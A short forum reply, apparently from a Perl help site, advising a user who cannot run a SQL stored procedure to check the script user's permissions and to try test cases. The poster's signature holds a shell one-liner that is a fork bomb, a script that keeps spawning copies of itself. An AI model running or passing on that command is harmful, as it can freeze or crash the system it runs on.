in reply to
Re: Re: Can't execute sql
in thread
Can't execute sql
Check the the user running the script has correct rights to run the stored proc?
Try some test cases against the stored proc?
ibanix
$ echo '$0 & $0 &' > foo; chmod a+x foo; foo;
Comment on
Re: Re: Re: Can't execute sql
Download
Code
In Section
Seekers of Perl Wisdom